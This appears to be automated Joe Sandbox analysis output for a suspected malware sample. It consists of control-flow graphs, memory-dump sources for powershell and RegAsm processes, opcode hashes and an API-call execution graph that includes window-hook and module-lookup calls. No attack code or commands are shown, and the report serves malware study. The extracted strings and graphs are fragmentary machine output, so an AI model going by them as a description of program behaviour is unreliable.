                                                              control_flow_graph 1381 7ff848f21a61-7ff848f21aa4 1384 7ff848f21bc9-7ff848f21c2a 1381->1384 1385 7ff848f21aaa-7ff848f21ab4 1381->1385 1409 7ff848f21c2c-7ff848f21c79 1384->1409 1386 7ff848f21acd-7ff848f21ad2 1385->1386 1387 7ff848f21ab6-7ff848f21ac3 1385->1387 1389 7ff848f21ad8-7ff848f21adb 1386->1389 1390 7ff848f21b6a-7ff848f21b74 1386->1390 1387->1386 1392 7ff848f21ac5-7ff848f21acb 1387->1392 1389->1390 1393 7ff848f21ae1-7ff848f21ae4 1389->1393 1395 7ff848f21b83-7ff848f21bc6 1390->1395 1396 7ff848f21b76-7ff848f21b82 1390->1396 1392->1386 1398 7ff848f21b0b 1393->1398 1399 7ff848f21ae6-7ff848f21b09 1393->1399 1395->1384 1403 7ff848f21b0d-7ff848f21b0f 1398->1403 1399->1403 1403->1390 1404 7ff848f21b11-7ff848f21b1b 1403->1404 1404->1390 1412 7ff848f21b1d-7ff848f21b27 1404->1412 1423 7ff848f21c7b 1409->1423 1424 7ff848f21c7c-7ff848f21c8d 1409->1424 1414 7ff848f21b29-7ff848f21b33 1412->1414 1416 7ff848f21b3a-7ff848f21b43 1414->1416 1418 7ff848f21b5c-7ff848f21b69 1416->1418 1419 7ff848f21b45-7ff848f21b52 1416->1419 1419->1418 1422 7ff848f21b54-7ff848f21b5a 1419->1422 1422->1418 1423->1424 1425 7ff848f21c8f 1424->1425 1426 7ff848f21c90-7ff848f21ca3 1424->1426 1425->1426 1426->1409 1428 7ff848f21ca5-7ff848f21d29 1426->1428 1432 7ff848f21e7b-7ff848f21ee3 1428->1432 1433 7ff848f21d2f-7ff848f21d39 1428->1433 1456 7ff848f21ee4-7ff848f21eeb 1432->1456 1434 7ff848f21d3b-7ff848f21d50 1433->1434 1435 7ff848f21d52-7ff848f21d57 1433->1435 1434->1435 1437 7ff848f21e18-7ff848f21e22 1435->1437 1438 7ff848f21d5d-7ff848f21d60 1435->1438 1440 7ff848f21e33-7ff848f21e78 1437->1440 1441 7ff848f21e24-7ff848f21e32 1437->1441 1442 7ff848f21da9 1438->1442 1443 7ff848f21d62-7ff848f21d75 1438->1443 1440->1432 1445 7ff848f21dab-7ff848f21dad 1442->1445 1443->1432 1454 7ff848f21d7b-7ff848f21d85 1443->1454 1445->1437 1449 7ff848f21daf-7ff848f21db2 1445->1449 1449->1437 1452 7ff848f21db4-7ff848f21dba 1449->1452 1457 7ff848f21dd9-7ff848f21def 1452->1457 1458 7ff848f21dbc-7ff848f21dd7 1452->1458 1459 7ff848f21d9e-7ff848f21da7 1454->1459 1460 7ff848f21d87-7ff848f21d94 1454->1460 1467 7ff848f21eec-7ff848f21f2b 1456->1467 1469 7ff848f21e08-7ff848f21e17 1457->1469 1470 7ff848f21df1-7ff848f21dfe 1457->1470 1458->1457 1459->1445 1460->1459 1466 7ff848f21d96-7ff848f21d9c 1460->1466 1466->1459 1478 7ff848f21f2d 1467->1478 1479 7ff848f21f32-7ff848f21f43 1467->1479 1470->1469 1474 7ff848f21e00-7ff848f21e06 1470->1474 1474->1469 1478->1479 1480 7ff848f21f2f 1478->1480 1481 7ff848f21f4a-7ff848f21f5b 1479->1481 1482 7ff848f21f45 1479->1482 1480->1479 1481->1456 1483 7ff848f21f5d-7ff848f21f63 1481->1483 1482->1481 1484 7ff848f21f47 1482->1484 1483->1467 1485 7ff848f21f65-7ff848f21f80 1483->1485 1484->1481 1487 7ff848f21fa0-7ff848f21fd9 1485->1487 1488 7ff848f21f82-7ff848f21f9f 1485->1488 1491 7ff848f22128-7ff848f22198 1487->1491 1492 7ff848f21fdf-7ff848f21fe9 1487->1492 1488->1487 1525 7ff848f2219c-7ff848f221d7 1491->1525 1493 7ff848f21feb-7ff848f22000 1492->1493 1494 7ff848f22002-7ff848f22007 1492->1494 1493->1494 1497 7ff848f2200d-7ff848f22010 1494->1497 1498 7ff848f220c5-7ff848f220cf 1494->1498 1502 7ff848f22059 1497->1502 1503 7ff848f22012-7ff848f22025 1497->1503 1500 7ff848f220d1-7ff848f220df 1498->1500 1501 7ff848f220e0-7ff848f22125 1498->1501 1501->1491 1505 7ff848f2205b-7ff848f2205d 1502->1505 1503->1491 1511 7ff848f2202b-7ff848f22035 1503->1511 1505->1498 1510 7ff848f2205f-7ff848f22062 1505->1510 1510->1498 1513 7ff848f22064-7ff848f2206a 1510->1513 1515 7ff848f2204e-7ff848f22057 1511->1515 1516 7ff848f22037-7ff848f22044 1511->1516 1517 7ff848f22089-7ff848f2209c 1513->1517 1518 7ff848f2206c-7ff848f22087 1513->1518 1515->1505 1516->1515 1524 7ff848f22046-7ff848f2204c 1516->1524 1526 7ff848f2209e-7ff848f220ab 1517->1526 1527 7ff848f220b5-7ff848f220c4 1517->1527 1518->1517 1524->1515 1536 7ff848f221d9 1525->1536 1537 7ff848f221de-7ff848f221ef 1525->1537 1526->1527 1532 7ff848f220ad-7ff848f220b3 1526->1532 1532->1527 1536->1537 1538 7ff848f221db 1536->1538 1539 7ff848f221f1 1537->1539 1540 7ff848f221f6-7ff848f22213 1537->1540 1538->1537 1539->1540 1541 7ff848f221f3 1539->1541 1540->1525 1542 7ff848f22215-7ff848f2228f 1540->1542 1541->1540 1545 7ff848f22429-7ff848f22493 1542->1545 1546 7ff848f22295-7ff848f2229f 1542->1546 1571 7ff848f22494-7ff848f224d5 1545->1571 1547 7ff848f222b9-7ff848f222bf 1546->1547 1548 7ff848f222a1-7ff848f222af 1546->1548 1551 7ff848f223be-7ff848f223c8 1547->1551 1552 7ff848f222c5-7ff848f222c8 1547->1552 1548->1547 1553 7ff848f222b1-7ff848f222b7 1548->1553 1557 7ff848f223db-7ff848f22426 1551->1557 1558 7ff848f223ca-7ff848f223da 1551->1558 1555 7ff848f222ca-7ff848f222dd 1552->1555 1556 7ff848f22311 1552->1556 1553->1547 1555->1545 1569 7ff848f222e3-7ff848f222ed 1555->1569 1560 7ff848f22313-7ff848f22315 1556->1560 1557->1545 1560->1551 1562 7ff848f2231b-7ff848f2231e 1560->1562 1562->1551 1567 7ff848f22324-7ff848f22327 1562->1567 1567->1551 1570 7ff848f2232d-7ff848f2236b 1567->1570 1572 7ff848f222ef-7ff848f22304 1569->1572 1573 7ff848f22306-7ff848f2230f 1569->1573 1570->1551 1585 7ff848f2236d-7ff848f22373 1570->1585 1591 7ff848f224e1-7ff848f224ed 1571->1591 1592 7ff848f224d7-7ff848f224dd 1571->1592 1572->1573 1573->1560 1586 7ff848f22392-7ff848f223a8 1585->1586 1587 7ff848f22375-7ff848f22390 1585->1587 1590 7ff848f223ae-7ff848f223bd 1586->1590 1587->1586 1593 7ff848f224f9-7ff848f2250b 1591->1593 1594 7ff848f224ef-7ff848f224f5 1591->1594 1592->1591 1593->1571 1596 7ff848f2250d-7ff848f22574 1593->1596 1594->1593 1600 7ff848f225bb-7ff848f225c5 1596->1600 1601 7ff848f22576-7ff848f225b8 1596->1601 1602 7ff848f225d0-7ff848f2261b 1600->1602 1603 7ff848f225c7-7ff848f225cf 1600->1603 1601->1600
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65e780a5ff97a3f97661b343aee034e207f09f93fea2b76afb2837a19c783233
                                                              • Instruction ID: d315f27aa6cfff8e0d11a9892d43fb9528808a003c018a12ecb804a6203c9f92
                                                              • Opcode Fuzzy Hash: 65e780a5ff97a3f97661b343aee034e207f09f93fea2b76afb2837a19c783233
                                                              • Instruction Fuzzy Hash: 32316B31E1EE890FE7B9B7A8245927577E5EF55781F0801BAD40DC31C2EE1A7C45828E

                                                              Control-flow Graph

                                                              control_flow_graph 1611 7ff848f2104a-7ff848f21056 1613 7ff848f2115a-7ff848f21164 1611->1613 1614 7ff848f2105c-7ff848f21093 1611->1614 1616 7ff848f21173-7ff848f211b6 1613->1616 1617 7ff848f21166-7ff848f21172 1613->1617 1624 7ff848f21095-7ff848f210b5 1614->1624 1625 7ff848f210b7 1614->1625 1626 7ff848f210b9-7ff848f210bb 1624->1626 1625->1626 1626->1613 1628 7ff848f210c1-7ff848f210c4 1626->1628 1628->1613 1630 7ff848f210ca-7ff848f21104 1628->1630 1635 7ff848f21120-7ff848f21123 1630->1635 1636 7ff848f21106-7ff848f2111e 1630->1636 1638 7ff848f2112a-7ff848f21133 1635->1638 1636->1635 1640 7ff848f2114c-7ff848f21159 1638->1640 1641 7ff848f21135-7ff848f21142 1638->1641 1641->1640 1643 7ff848f21144-7ff848f2114a 1641->1643 1643->1640
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2278836005.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 55509e6078e364d72d11f4c995f81568904d39b2b0a6b88371891ae4f2b81fa7
                                                              • Instruction ID: 226bc9453e7dd17729b2055cf0f2471461256192f2a0061ea5e7669afb34aa50
                                                              • Opcode Fuzzy Hash: 55509e6078e364d72d11f4c995f81568904d39b2b0a6b88371891ae4f2b81fa7
                                                              • Instruction Fuzzy Hash: F631EE32E1EA8A4FF7A9B7AC246127865D1FF416E1F5801BAD409C31D3DE1EAC84435E
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2155448675.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848e70000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction ID: 24ef75c526cb65825109a4e7586d62867e1718cfd4eae63a3c90891dd0916743
                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction Fuzzy Hash: CF01677111CB0D4FDB44EF0CE451AA6B7E0FB95364F50056DE58AC3691DB36E882CB45

                                                              Execution Graph

                                                              Execution Coverage: 12%
                                                              Dynamic/Decrypted Code Coverage: 100%
                                                              Signature Coverage: 0%
                                                              Total number of Nodes: 204
                                                              Total number of Limit Nodes: 17
                                                              execution_graph 32610 14a75f8 DuplicateHandle 32611 14a768e 32610->32611 32612 14a23b8 32614 14a23fc SetWindowsHookExW 32612->32614 32615 14a2442 32614->32615 32616 145d0fc 32617 145d114 32616->32617 32618 145d16e 32617->32618 32624 59533d0 32617->32624 32629 59526c8 32617->32629 32635 59526b8 32617->32635 32641 5953438 32617->32641 32646 5953429 32617->32646 32625 59533d4 32624->32625 32625->32618 32626 59533fa 32625->32626 32651 59539a3 32625->32651 32656 59539c8 32625->32656 32626->32618 32630 59526c9 32629->32630 32632 59533d0 2 API calls 32630->32632 32633 5953429 2 API calls 32630->32633 32634 5953438 2 API calls 32630->32634 32631 595270f 32631->32618 32632->32631 32633->32631 32634->32631 32636 59526bc 32635->32636 32638 59533d0 2 API calls 32636->32638 32639 5953429 2 API calls 32636->32639 32640 5953438 2 API calls 32636->32640 32637 595270f 32637->32618 32638->32637 32639->32637 32640->32637 32642 5953439 32641->32642 32643 5953497 32642->32643 32644 59539a3 2 API calls 32642->32644 32645 59539c8 2 API calls 32642->32645 32644->32643 32645->32643 32647 595342c 32646->32647 32648 5953497 32647->32648 32649 59539a3 2 API calls 32647->32649 32650 59539c8 2 API calls 32647->32650 32649->32648 32650->32648 32653 59539c4 32651->32653 32652 5953a68 32652->32626 32661 5953a80 32653->32661 32665 5953a70 32653->32665 32658 59539c9 32656->32658 32657 5953a68 32657->32626 32659 5953a80 2 API calls 32658->32659 32660 5953a70 2 API calls 32658->32660 32659->32657 32660->32657 32662 5953a81 32661->32662 32664 5953a91 32662->32664 32669 5954c26 32662->32669 32664->32652 32666 5953a74 32665->32666 32667 5953a91 32666->32667 32668 5954c26 2 API calls 32666->32668 32667->32652 32668->32667 32670 5954c44 32669->32670 32674 5954c61 32670->32674 32678 5954c70 32670->32678 32671 5954c5a 32671->32664 32675 5954cb2 32674->32675 32677 5954cb9 32674->32677 32676 5954d0a CallWindowProcW 32675->32676 32675->32677 32676->32677 32677->32671 32679 5954cb2 32678->32679 32681 5954cb9 32678->32681 32680 5954d0a CallWindowProcW 32679->32680 32679->32681 32680->32681 32681->32671 32437 14a7c10 32439 14a7c3e 32437->32439 32441 14a71c4 32439->32441 32440 14a7c5e 32440->32440 32442 14a71cf 32441->32442 32443 14a8784 32442->32443 32446 14aa410 32442->32446 32451 14aa420 32442->32451 32443->32440 32447 14aa441 32446->32447 32448 14aa465 32447->32448 32456 14aa5bf 32447->32456 32460 14aa5d0 32447->32460 32448->32443 32453 14aa441 32451->32453 32452 14aa465 32452->32443 32453->32452 32454 14aa5bf 4 API calls 32453->32454 32455 14aa5d0 4 API calls 32453->32455 32454->32452 32455->32452 32457 14aa5dd 32456->32457 32458 14aa616 32457->32458 32464 14a83f4 32457->32464 32458->32448 32463 14aa5dd 32460->32463 32461 14aa616 32461->32448 32462 14a83f4 4 API calls 32462->32461 32463->32461 32463->32462 32465 14a83ff 32464->32465 32467 14aa688 32465->32467 32468 14a8428 32465->32468 32467->32467 32469 14a8433 32468->32469 32475 14a8438 32469->32475 32471 14aa6f7 32479 5950040 32471->32479 32488 5950006 32471->32488 32472 14aa731 32472->32467 32476 14a8443 32475->32476 32477 14abc78 32476->32477 32478 14aa420 4 API calls 32476->32478 32477->32471 32478->32477 32481 5950071 32479->32481 32482 5950171 32479->32482 32480 595007d 32480->32472 32481->32480 32496 59502b8 32481->32496 32500 59502a8 32481->32500 32482->32472 32483 59500bd 32504 59515c9 32483->32504 32508 59515d8 32483->32508 32489 5950034 32488->32489 32490 595007d 32489->32490 32492 59502b8 2 API calls 32489->32492 32493 59502a8 2 API calls 32489->32493 32490->32472 32491 59500bd 32494 59515c9 2 API calls 32491->32494 32495 59515d8 2 API calls 32491->32495 32492->32491 32493->32491 32494->32490 32495->32490 32497 59502b9 32496->32497 32512 59502f8 32497->32512 32498 59502c2 32498->32483 32501 59502ac 32500->32501 32503 59502f8 2 API calls 32501->32503 32502 59502c2 32502->32483 32503->32502 32505 59515cc 32504->32505 32506 59516b2 32505->32506 32524 59523b0 32505->32524 32510 59515d9 32508->32510 32509 59516b2 32509->32509 32510->32509 32511 59523b0 2 API calls 32510->32511 32511->32509 32513 59502fd 32512->32513 32514 595033c 32513->32514 32519 59502f8 GetModuleHandleW 32513->32519 32520 59504f8 32513->32520 32514->32498 32515 5950324 32515->32514 32516 5950540 GetModuleHandleW 32515->32516 32517 595056d 32516->32517 32517->32498 32519->32515 32521 59504f9 GetModuleHandleW 32520->32521 32523 595056d 32521->32523 32523->32515 32525 59523dc 32524->32525 32525->32506 32526 59524b2 32525->32526 32527 59524fe CreateWindowExW 32525->32527 32532 59523b0 CreateWindowExW 32526->32532 32533 5952510 32526->32533 32530 5952634 32527->32530 32528 59524f5 32528->32506 32530->32530 32532->32528 32534 5952578 CreateWindowExW 32533->32534 32536 5952634 32534->32536 32536->32536 32537 14a2290 32538 14a2294 32537->32538 32542 5958220 32538->32542 32546 5958108 32538->32546 32550 5958118 32538->32550 32543 59581f7 32542->32543 32544 595821e 32543->32544 32554 595829f 32543->32554 32544->32538 32548 5958110 32546->32548 32547 595821e 32547->32538 32548->32547 32549 595829f GlobalMemoryStatusEx 32548->32549 32549->32548 32551 5958144 32550->32551 32552 595821e 32551->32552 32553 595829f GlobalMemoryStatusEx 32551->32553 32552->32538 32553->32551 32556 59582a4 32554->32556 32555 5958266 32555->32543 32556->32555 32562 5958b20 32556->32562 32566 59588c0 32556->32566 32571 5958b11 32556->32571 32575 59588b3 32556->32575 32557 59583b6 32557->32557 32563 5958b21 32562->32563 32580 595e090 32563->32580 32564 5958d92 32564->32557 32568 59588d8 32566->32568 32567 595896e 32567->32557 32568->32567 32570 595e090 GlobalMemoryStatusEx 32568->32570 32569 5958d92 32569->32557 32570->32569 32572 5958b1c 32571->32572 32574 595e090 GlobalMemoryStatusEx 32572->32574 32573 5958d92 32573->32557 32574->32573 32577 59588d8 32575->32577 32576 595896e 32576->32557 32577->32576 32579 595e090 GlobalMemoryStatusEx 32577->32579 32578 5958d92 32578->32557 32579->32578 32581 595e094 32580->32581 32585 595e338 32581->32585 32591 595e348 32581->32591 32582 595e127 32582->32564 32586 595e33c 32585->32586 32586->32582 32587 595e324 32586->32587 32596 595e380 32586->32596 32601 595e37b 32586->32601 32587->32582 32588 595e356 32588->32582 32592 595e349 32591->32592 32594 595e380 GlobalMemoryStatusEx 32592->32594 32595 595e37b GlobalMemoryStatusEx 32592->32595 32593 595e356 32593->32582 32594->32593 32595->32593 32597 595e38d 32596->32597 32598 595e3b5 32596->32598 32597->32588 32606 595dcf8 32598->32606 32602 595e380 32601->32602 32603 595e38d 32602->32603 32604 595dcf8 GlobalMemoryStatusEx 32602->32604 32603->32588 32605 595e3d2 32604->32605 32605->32588 32607 595e458 GlobalMemoryStatusEx 32606->32607 32609 595e3d2 32607->32609 32609->32588 32682 14a73b0 32683 14a73f6 GetCurrentProcess 32682->32683 32685 14a7448 GetCurrentThread 32683->32685 32686 14a7441 32683->32686 32687 14a747e 32685->32687 32688 14a7485 GetCurrentProcess 32685->32688 32686->32685 32687->32688 32691 14a74bb 32688->32691 32689 14a74e3 GetCurrentThreadId 32690 14a7514 32689->32690 32691->32689
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                              • API String ID: 0-99275883
                                                              • Opcode ID: ab4c173a4eae7fad4e667a199218366928ea6c283e26bb38c8d3befaebe07bb5
                                                              • Instruction ID: 65d293d995bff7ac48962d4ef241fefff2e8db25e6e3db9391c36b3a7cb6b833
                                                              • Opcode Fuzzy Hash: ab4c173a4eae7fad4e667a199218366928ea6c283e26bb38c8d3befaebe07bb5
                                                              • Instruction Fuzzy Hash: 50822A34A20209DFCB94CFA8C584EAEBBF2FF48310F158559E5159B3A6D734EA41CB54
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$(o]q$(o]q$,aq$,aq$Haq$\;]q$\;]q
                                                              • API String ID: 0-2494306592
                                                              • Opcode ID: ce5c524f0094ed2fb320b76af15030dd87bfe32bbcd534b8092c15fc0f1e1f42
                                                              • Instruction ID: 7a52fdee03e6777d74fd79082beeb3029d920757e9a22821bde0594fde3d3b60
                                                              • Opcode Fuzzy Hash: ce5c524f0094ed2fb320b76af15030dd87bfe32bbcd534b8092c15fc0f1e1f42
                                                              • Instruction Fuzzy Hash: DD929D70A20209CFDB54CFA9C894AAEBBF6BF88300F558569E515DB3A1DB31DD41CB90

                                                              Control-flow Graph

                                                               • Function 67f5948: executed/not-executed edge list not reproduced. Internal calls seen in the graph: 67f66c8, 595ee10 / 595ee00, 67f55fc, 67f560c, 67f561c, 67f5628, 67f5638, 67f5648, 67f5658, 67f5668, 67f5678, 67f5688. No Windows API calls appear in this graph.
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: ede4bd47a441f47c978f24877b0c2feb4da14046b0fa4323dc8bdae3e7af7d82
                                                              • Instruction ID: fd619ddaa814e6c18900de30b3d9239e723b25c38cba85ba8bae7a9cae07b686
                                                              • Opcode Fuzzy Hash: ede4bd47a441f47c978f24877b0c2feb4da14046b0fa4323dc8bdae3e7af7d82
                                                              • Instruction Fuzzy Hash: 46628E34B102008FDB55AF75D968F2D77A7AFC8B10F108529E906AB395DF39DC828B91

                                                              Control-flow Graph

                                                               • Function 14a73a2: executed/not-executed edge list not reproduced. API calls in the graph: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId; internal call: 14a7580.
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 014A742E
                                                              • GetCurrentThread.KERNEL32 ref: 014A746B
                                                              • GetCurrentProcess.KERNEL32 ref: 014A74A8
                                                              • GetCurrentThreadId.KERNEL32 ref: 014A7501
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3343068533.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_14a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 1965fbfd858ee2e52d74548bb422045abcaee23e64f2edd5f9cfd6c6be3e5613
                                                              • Instruction ID: c497093e4e2ebb506f570493ee4f2ce98f1f82d3c61dd5499b233ef06bdac63d
                                                              • Opcode Fuzzy Hash: 1965fbfd858ee2e52d74548bb422045abcaee23e64f2edd5f9cfd6c6be3e5613
                                                              • Instruction Fuzzy Hash: AD5148B09013498FDB18DFA9D548BAEBFF1FF88314F20846AD419A7360D7399944CB65

                                                              Control-flow Graph

                                                               • Function 14a73b0: executed/not-executed edge list not reproduced. API calls in the graph: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId; internal call: 14a7580.
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 014A742E
                                                              • GetCurrentThread.KERNEL32 ref: 014A746B
                                                              • GetCurrentProcess.KERNEL32 ref: 014A74A8
                                                              • GetCurrentThreadId.KERNEL32 ref: 014A7501
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3343068533.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_14a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: bec50d9a03f5c6683a1d17a44cb474db31111c267009d4a21af994e82edf19ee
                                                              • Instruction ID: a883ac0e11f3b2df477b083ed6baef4ece6e1fcc00c99d3248a1b534521b2c5b
                                                              • Opcode Fuzzy Hash: bec50d9a03f5c6683a1d17a44cb474db31111c267009d4a21af994e82edf19ee
                                                              • Instruction Fuzzy Hash: 735148B09002498FDB28DFA9D548BAEBFF5FF88314F208469D019A73A0D7399944CF65

                                                              Control-flow Graph

                                                               • Function 67f4118: executed/not-executed edge list not reproduced. Internal calls in the graph: 67f3f78, 67f2f88. No Windows API calls appear in this graph.
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$4']q$4']q
                                                              • API String ID: 0-2177113439
                                                              • Opcode ID: 6d739523e0545eff5d18df22670e2383f3c6c7269e6c1c78790f87ab3b5628de
                                                              • Instruction ID: 41e18bddc550f28d33dcd2d5c172f0477492ac852030081beb54aa7103e33733
                                                              • Opcode Fuzzy Hash: 6d739523e0545eff5d18df22670e2383f3c6c7269e6c1c78790f87ab3b5628de
                                                              • Instruction Fuzzy Hash: 78E161317201118FDB659F39C958F3E77E6EF84610F188469E606DB3AAEE29CC42C791

                                                              Control-flow Graph

                                                               • Function 67f3510: executed/not-executed edge list not reproduced. No calls (API or internal) appear in this graph.
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $]q$$]q
                                                              • API String ID: 0-127220927
                                                              • Opcode ID: eb1bc72dab52ece11d9fb4c9570c10740d287d26395cb674348c1244cc4cc09c
                                                              • Instruction ID: 40a965e65ee519af1731ddea3bf109c4806931c38b099c1971683872abb7a344
                                                              • Opcode Fuzzy Hash: eb1bc72dab52ece11d9fb4c9570c10740d287d26395cb674348c1244cc4cc09c
                                                              • Instruction Fuzzy Hash: AF527074A002198FEB559FA4C960B9EBBB7FF94300F1080AED60A6B3A5CE395D45CF51

                                                              Control-flow Graph

                                                               • Function 67f0d20: executed/not-executed edge list not reproduced. Internal calls in the graph: 67f0d20 / 67f0d10 (recursive), 67f156b / 67f16f8 / 67f16e8 / 67f1578 / 67f1573 / 67f11d1, 67f410b / 67f4118 / 67f4595, 67f11db / 67f11e0. No Windows API calls appear in this graph.
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq$Haq
                                                              • API String ID: 0-4016896955
                                                              • Opcode ID: 92285da43c461faddcb1bff5c5cf5913a8d289552b4f9674348fe92c6e2a359d
                                                              • Instruction ID: f878f4540a8c324f1e1d0fc0185e1d1081f71e9ae830d60f57d6fdd649dcee04
                                                              • Opcode Fuzzy Hash: 92285da43c461faddcb1bff5c5cf5913a8d289552b4f9674348fe92c6e2a359d
                                                              • Instruction Fuzzy Hash: F8C1BD347202158FDB559F38C864A3A7BA6BF88650F148569E906CB396DF39DC02CBD1

                                                              Control-flow Graph

                                                               • Function 67f11e0: executed/not-executed edge list not reproduced. No calls (API or internal) appear in this graph.
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,aq$,aq
                                                              • API String ID: 0-2990736959
                                                              • Opcode ID: ce87d7a3b88bfb84b092b06b61d71b1aad3277c917fdd2844cec478b42b9b9bb
                                                              • Instruction ID: 90e2471ba2b4a8fb5701ba9ab20a546db46eead0a34d65f2964936add05a8079
                                                              • Opcode Fuzzy Hash: ce87d7a3b88bfb84b092b06b61d71b1aad3277c917fdd2844cec478b42b9b9bb
                                                              • Instruction Fuzzy Hash: 9D718E34E20105CFCB94CFA9C484D7AB7B2BF8A214FA58565D611E7764D731E841CBA1

                                                              Control-flow Graph

                                                               • Function 59523b0: executed/not-executed edge list not reproduced. API call in the graph: CreateWindowExW; internal calls: 5952510 / 59523b0.
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a6bc1839df4327bc2b0a3d2073f3b3aa39b4f57a2da850588f7f02bf4321bb27
                                                              • Instruction ID: 5e80fb2a0ef5403dfacb5bbf13c3f25aaa42eb2a926e1fbabe0d1496d8f5793e
                                                              • Opcode Fuzzy Hash: a6bc1839df4327bc2b0a3d2073f3b3aa39b4f57a2da850588f7f02bf4321bb27
                                                              • Instruction Fuzzy Hash: DB919F75C093889FCF06CFA5C850A9DBFB5FF4A310F19819BE845AB262D3349859CB52

                                                              Control-flow Graph: basic blocks 59502f8-5950588; calls 59504f8, 59502f8, 5950591, 59505a0 and GetModuleHandleW (rendered graph omitted)
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ed21c3f49efb81780c159b617f3ef13a4c496c2d88f73e38d60db7154e3248b7
                                                              • Instruction ID: c60e53c01068d919add91d35b35960c3aa7756a699a46fe9f3f7b84682ede8be
                                                              • Opcode Fuzzy Hash: ed21c3f49efb81780c159b617f3ef13a4c496c2d88f73e38d60db7154e3248b7
